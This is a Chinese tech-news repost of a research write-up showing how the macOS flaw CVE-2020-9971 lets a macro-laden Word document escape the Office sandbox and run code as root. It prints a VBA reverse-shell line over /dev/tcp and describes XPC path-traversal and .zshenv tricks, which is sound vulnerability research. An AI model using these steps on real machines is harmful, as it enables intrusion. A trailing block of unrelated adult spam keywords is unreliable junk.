《電子技術應用》
您所在的位置:首頁 > 通信與網絡 > 業界動態 > 利用CVE-2020-9971繞過Microsoft Office的應用程序沙箱

利用CVE-2020-9971繞過Microsoft Office的應用程序沙箱

2021-07-12
來源:嘶吼專業版
關鍵詞: 漏洞 Word macOSiOS

  在本文中,研究人員展示了他們如何利用已發布的 macOS/iOS 權限提升漏洞Word 文檔武器化,解除應用程序沙箱限制并獲得更高權限。

  CVE-2020-9971 是 macOS/iOS 中的一個邏輯漏洞,可用于穩定的提權漏洞。在這篇文章中,研究人員 (@R3dF09) 提到它也可以在最受限制的應用沙箱中運行,因此研究人員決定對其進行測試并使用武器化的 Word 文檔繞過 Microsoft Office 2019(適用于 Mac)應用沙箱。為了完成這個任務,研究人員不得不使用一些有趣的技巧來繞過 Apple 的文件隔離。

  CVE-2020-9971位于launchd進程中,與XPC Services機制有關。這種機制提供了進程間通信,允許開發人員創建為其應用程序執行特定任務的服務。這通常用于將應用程序拆分為更小的部分,從而提高可靠性和安全性。launchd是mac系統下通用的進程管理器,是mac系統下非常重要的一個進程,一般來說該進程不允許直接以命令行的形式調用。只能通過其控制管理界面,launchctl來進行控制。launchd主要功能是進程管理。可以理解成是一個常駐在后臺的進程,根據用戶的配置,來響應特定的系統事件。launchd既可以用于系統級別的服務,又可以用于個人用戶級別的服務。

  每個進程都有自己的域,由 launchd 管理,其中包含有關進程可用的 XPC 服務的信息。蘋果聲稱只有擁有者進程才能修改自己的域,但該漏洞的核心漏洞是能夠將任意 XPC 服務添加到任意進程域中,然后觸發它在該進程的上下文中運行。起初,攻擊者將自制的 XPC 服務“注入”到具有 root 權限的特定進程的域中(systemsoundserverd)。開發者還使用了 XPC 服務的一個眾所周知的功能來監聽套接字以觸發和啟動它。

  接下來,研究人員將描述成功將 Word 文檔武器化并繞過 Word 應用程序沙箱的步驟。該研究是在易受 CVE-2020-9971 攻擊的 macOS 10.15.4 和當時最新版本的 Microsoft Office 2019 上進行的,但這無關緊要,因為該漏洞在操作系統端。

  漏洞利用

  研究人員的第一個目標是創建一個獨立的命令行漏洞利用。在這個階段,研究人員認為他們只需要刪除它并從武器化的 Word 文檔中執行它即可,但實際情況并非如此。無論如何,研究人員用 XCode 創建了一個應用程序,附帶一個簡單的 XPC 服務,它執行以下步驟:

  1.查找研究人員要使用的 root 特權進程的 PID。正如研究人員已經知道不可能在 Office 應用沙箱中執行 ps 一樣,研究人員改為使用 launchctl 打印系統的輸出,它顯示了系統中的進程域。此時研究人員注意到systemoundserverd的進程域是在啟動后延遲相當長的時間創建的,所以研究人員改用launchservicesd的進程域;

  2.將研究人員的 XPC 服務注入到找到的 PID 的進程域中;

  3.通過打開 TCP 套接字觸發研究人員的 XPC 服務的啟動;

  附帶的XPC服務只創建一個文件(表示成功),并配置為在指定的TCP端口上偵聽。漏洞利用和 XPC 服務都存儲在同一個應用程序包中,但請注意研究人員有兩個不同的可執行文件。

  通過這個獨立的漏洞利用,研究人員能夠從普通用戶那里獲得 root 權限,現在是時候開始實現研究人員的最終目標了——繞過沙盒。

  繞過沙盒

  研究人員的最終目標是使用此漏洞將 Word 文檔武器化,以繞過應用程序沙箱。其基礎是能夠從這個Word文檔中執行shell命令,這可以通過Microsoft Office中的其他漏洞實現,或者更容易通過VBA宏實現,這讓研究人員只剩下說服用戶按下“啟用宏”的工作。更多關于針對 Mac 用戶的基于宏的攻擊請點此https://perception-point.io/mac-isnt-safe-how-do-you-like-them-apples/查看。對于這個概念驗證,研究人員將使用 VBA 宏。

  在 Office 應用沙箱的上下文中獲取 bash shell 很簡單,然后利用這些限制。研究人員所要做的就是偵聽特定端口(例如 netcat)并從 Word 文檔中執行以下 VBA 宏:

  MacScript(“do shell script ”“bash -I >&/dev/tcp/127.0.0.1/PORT 0>&1 &”“”)

  此時,在沙箱中有了一個shell,研究人員試圖轉儲并執行獨立漏洞,但它沒有奏效。經過一些研究,研究人員發現他們在沙箱中創建的每個文件都是使用“com.apple.quarantine”屬性創建的,這個可以通過 xattr 實用程序觀察到。

  隔離屬性是許多 macOS 保護的核心,最初,它僅附加到從互聯網下載的文件中,以執行多項安全檢查(例如文件隔離、GateKeeper、Notarization 和 XProtect)。自從引入了沙箱之后,這個屬性又增加了一個角色——標記從沙箱中創建的文件,并完全阻止它們被執行。以下是研究人員試圖從沙箱shell中轉儲和執行一個文件時產生的日志:

  kernel: (Sandbox) Sandbox: bash(1724) deny(1) process-exec* /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test

  kernel: (Quarantine) exec of /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test denied since it was quarantined by Microsoft Word and created without user consent, qtn-flags was 0x00000086

  可以看到研究人員可以執行 shell 命令,但不能轉儲和運行他們自己的可執行文件。對于可利用的可執行文件,研究人員有一個簡單的替換方法:只需在ctypes包的幫助下運行一個執行相同步驟的python腳本。現在研究人員就能夠將 XPC 服務注入目標進程域,甚至觸發它的執行,但它沒有運行:XPC 服務可執行文件本身被標記為隔離屬性。

  現在是時候更深入地研究XPC服務的結構了。從外部看,它看起來像一個擴展名為“xpc”的單一文件,但它實際上是一個具有典型結構的文件夾:

微信圖片_20210712140230.jpg

  主要組件是 Info.plist 文件,它是一個描述服務的 XML 文件,以及可執行文件本身(位于 MacOS 文件夾內)。Info.plist 中的部分內容如下:

  < key >CFBundleExecutable< /key >< string >AppService< /string >

  研究人員不能使用他們自己的可執行文件,所以唯一的選擇是使用系統現有的可執行文件之一。研究人員嘗試在 CFBundleExecutable 項中使用完整路徑,但是 XPC 服務根本無法加載。很明顯,macOS 會在目錄 Contents/MacOS 中查找具有此項中指定名稱的可執行文件,也許研究人員可以使用路徑遍歷來指向現有的可執行文件,并嘗試將值更改為:

  < key >CFBundleExecutable< /key >< string >/////////usr/bin/yes< /string >

  令研究人員驚訝的是,它奏效了!當研究人員使用這個“假”XPC 服務執行漏洞利用時,研究人員發現了一個具有 root 權限的“是”進程,即使研究人員是從沙箱中執行的。

  因此,研究人員有能力以 root 權限運行進程,但似乎無法控制它們的參數。在團隊內部就這個問題進一步咨詢后,研究人員想出了一個好辦法,他們注意到可以控制新進程的環境變量,即運行一個 shell 作為 XPC 服務(例如 zsh),將其 HOME 目錄更改為研究人員可以控制,并將 shell 在執行開始時提供的文件放在那里(例如。zshenv)。

  將它們全部封裝在一起

  研究人員編寫了一個 python 腳本,執行以下步驟:

  1.將“。zshenv”文件寫入當前目錄,在沙箱內,路徑為 /Users/user/Library/Containers/com.microsoft.Word/Data,其中包含研究人員希望以 root 身份執行的載荷;

  2.查找研究人員要使用的 root 權限進程的 PID (launchservicesd);

  3.創建“假”XPC 服務,其中可執行文件指向 zsh,并將 HOME 環境變量設置為當前目錄;

  4.將“假”XPC 服務注入到找到的 PID 的進程域中;

  5.通過打開 TCP 套接字觸發 XPC 服務的啟動;

  然后研究人員將該腳本封裝為 base64 格式,以便從VBA宏中執行它,并將其插入到 AutoOpen 子例程中。具體演示過程請點此,其中有效載荷只在/tmp/hacked中創建一個文件(請注意,該文件是以 root 身份創建的,并且沒有隔離位)。

  總結

  研究人員證明了 CVE-2020-9971 可以用作沙箱逃逸漏洞,以 Word 文檔作為研究人員的 POC。在這個過程中,研究人員發現了一種通過 XPC 服務啟動任意可執行文件的方法(在 CFBundleExecutable 值中進行路徑遍歷),特別是執行 shell 腳本(通過控制 HOME 環境變量和轉儲 .zshenv 文件的技巧)。

  這個沙箱逃逸漏洞使研究人員能夠為 macOS 創建一個快速、簡單和廉價的武器化 Word 文檔,這嚴重危害了系統安全。

  安全建議

  1.避免打開陌生文檔,尤其是運行來自未知來源或你不完全信任的發送方;

  2.使用能夠處理此類攻擊的綜合性安全產品。




電子技術圖片.png

本站內容除特別聲明的原創文章之外,轉載內容只為傳遞更多信息,并不代表本網站贊同其觀點。轉載的所有的文章、圖片、音/視頻文件等資料的版權歸版權所有權人所有。本站采用的非本站原創文章及圖片等內容無法一一聯系確認版權者。如涉及作品內容、版權和其它問題,請及時通過電子郵件或電話通知我們,以便迅速采取適當措施,避免給雙方造成不必要的經濟損失。聯系電話:010-82306118;郵箱:aet@chinaaet.com。
亚洲一区二区欧美_亚洲丝袜一区_99re亚洲国产精品_日韩亚洲一区二区
欧美亚洲第一页| 在线观看欧美成人| 快she精品国产999| 久久高清免费观看| 欧美一级专区免费大片| 亚洲欧美视频在线| 亚洲一区免费看| 亚洲午夜激情| 亚洲天堂av综合网| 亚洲午夜精品在线| 亚洲一区二区三区成人在线视频精品 | 99视频精品全部免费在线| 亚洲国产乱码最新视频| 欧美亚洲系列| 久久国产精品黑丝| 亚洲黄色一区| 亚洲精品国产精品国自产观看浪潮| 亚洲成色www8888| 亚洲激情综合| 99re国产精品| 亚洲一区综合| 午夜久久一区| 久久激情五月婷婷| 久久五月天婷婷| 免费一级欧美片在线播放| 欧美黄色aaaa| 欧美亚州韩日在线看免费版国语版| 国产精品理论片在线观看| 国产欧美日韩亚洲| 国产亚洲综合性久久久影院| 黑人巨大精品欧美一区二区| 亚洲国产欧美在线| 一本色道88久久加勒比精品| 亚洲免费一区二区| 欧美在线视频免费播放| 亚洲精品中文字幕有码专区| 亚洲一区二区三区免费视频| 欧美一区二区成人| 久久亚洲精品网站| 男女激情久久| 国产精品国产三级国产普通话蜜臀| 国产欧美精品| 在线国产精品播放| 一区二区久久久久久| 亚洲欧美日韩国产综合| 久久精品亚洲一区二区三区浴池| 亚洲精品视频在线观看免费| 亚洲自拍另类| 免费观看成人鲁鲁鲁鲁鲁视频| 欧美日韩免费一区| 国产欧美日韩另类视频免费观看 | 在线观看91精品国产入口| 亚洲欧洲一区二区三区在线观看| 一区二区三区欧美激情| 欧美一区二区三区免费看| 亚洲精品久久在线| 亚洲欧美国产一区二区三区| 久久人人爽国产| 欧美三级日韩三级国产三级| 国产亚洲福利社区一区| 亚洲精选久久| 性亚洲最疯狂xxxx高清| 日韩午夜在线| 久久精品在线视频| 欧美色道久久88综合亚洲精品| 国产一区高清视频| 亚洲精品国产精品国自产观看 | 欧美一级在线播放| 一本色道久久精品| 久久久久国产精品厨房| 欧美日韩亚洲综合在线| 国产一区二区三区黄| 99国产欧美久久久精品| 亚洲成人在线视频播放| 一区二区三区免费网站| 久久久夜精品| 欧美午夜精彩| 亚洲二区在线| 欧美在线观看网站| 亚洲综合色在线| 欧美激情片在线观看| 国产一区二区三区在线观看精品| 99成人在线| 亚洲日本va午夜在线电影 | 久久男女视频| 国产精品一级在线| 99精品国产99久久久久久福利| 亚洲国产综合视频在线观看| 欧美一区二区私人影院日本 | 亚洲影院色无极综合| 日韩午夜在线观看视频| 免费成人av资源网| 国产欧美综合一区二区三区| 99精品热视频| 日韩一区二区精品葵司在线| 浪潮色综合久久天堂| 国产啪精品视频| 亚洲淫性视频| 亚洲综合色在线| 欧美日韩午夜剧场| 亚洲国产精品va在线看黑人| 久久国产精品久久久久久久久久| 性欧美18~19sex高清播放| 欧美亚洲第一页| 日韩一本二本av| 一本色道久久综合亚洲精品婷婷 | 亚洲一区二区伦理| 一区二区三区四区五区精品视频| 欧美大片一区二区| 在线免费观看日韩欧美| 亚洲高清自拍| 噜噜噜91成人网| 伊人婷婷久久| 亚洲黄色有码视频| 美女精品网站| 亚洲高清av在线| 亚洲国产专区| 欧美国产精品| 亚洲精品久久| 亚洲视频免费看| 国产精品v欧美精品∨日韩| 一本久道久久久| 亚洲一区日韩在线| 国产精品一区在线播放| 午夜亚洲伦理| 久久久久久久高潮| 黑丝一区二区三区| 最新亚洲电影| 欧美日韩国产黄| 在线午夜精品| 午夜亚洲视频| 国产视频一区二区三区在线观看| 欧美在线电影| 免费观看在线综合色| 亚洲福利视频一区| 99精品免费| 国产精品v欧美精品v日本精品动漫 | 日韩亚洲欧美一区| 欧美人妖在线观看| 一本一本久久a久久精品综合麻豆| 亚洲一区二区在线观看视频| 国产精品色午夜在线观看| 亚洲欧美三级在线| 久久久亚洲一区| 亚洲欧洲精品成人久久奇米网| 一区二区三区精密机械公司| 国产精品免费小视频| 欧美亚洲免费| 欧美成人免费在线观看| 99热这里只有精品8| 香港成人在线视频| 国内视频精品| 夜夜嗨av一区二区三区四区 | 日韩一二三区视频| 国产精品激情| 欧美在线短视频| 欧美激情bt| 亚洲综合精品| 美女视频一区免费观看| 99视频日韩| 久久精品女人天堂| 亚洲人精品午夜在线观看| 亚洲欧美日韩精品一区二区 | 欧美激情网友自拍| 亚洲视频一起| 免费成人在线视频网站| 一本大道久久a久久精二百| 久久精品二区| 亚洲精品极品| 久久精品网址| 99国产精品99久久久久久| 久久久99免费视频| 日韩一级裸体免费视频| 久久精品国产69国产精品亚洲| 亚洲国产成人精品女人久久久| 亚洲欧美国产一区二区三区| 永久免费毛片在线播放不卡| 亚洲视频免费| 在线国产亚洲欧美| 午夜在线电影亚洲一区| 91久久国产自产拍夜夜嗨| 欧美一区二区国产| 亚洲国产中文字幕在线观看| 久久爱91午夜羞羞| 日韩亚洲不卡在线| 久久婷婷久久| 亚洲永久免费视频| 欧美激情一二三区| 欧美一区在线直播| 国产精品地址| 一区二区精品在线观看| 红桃视频亚洲| 欧美一区二区三区在| 99国产精品99久久久久久粉嫩| 美女在线一区二区| 亚洲欧美中文在线视频| 欧美日韩一区综合| 亚洲国产日韩欧美一区二区三区| 国产精品久久久久免费a∨| 99视频精品免费观看|